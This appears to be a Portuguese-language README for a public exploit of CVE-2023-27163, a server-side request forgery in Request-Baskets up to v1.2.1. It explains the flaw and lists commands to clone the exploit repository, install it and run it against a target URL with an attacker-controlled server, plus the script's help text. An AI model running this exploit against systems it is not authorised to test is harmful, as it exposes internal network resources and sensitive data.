
CVE-2023-27163 Request-Baskets v1.2.1 - Server-side request forgery (SSRF)
Request-Baskets v1.2.1 - Falsificação de solicitação do lado do servidor (SSRF)
Foi descoberto que o request-baskets até a v1.2.1 contém uma vulnerabilidade de falsificação de solicitação do lado do servidor (SSRF) através do componente /api/baskets/{name}. Essa vulnerabilidade permite que atacantes acessem recursos de rede e informações sensíveis por meio de uma solicitação de API manipulada.
git clone https://github.com/0xFTW/CVE-2023-27163
cd CVE-2023-27163
pip3 install -r requirements.txt
python3 CVE-2023-27163.py url attack_server
Script de exploração do Request Baskets
argumentos posicionais:
url caminho principal (/) do servidor (ex: http://127.0.0.1:5000/)
attack_server SERVIDOR_ATAQUE
opções:
-h, --help mostra esta mensagem de ajuda e sai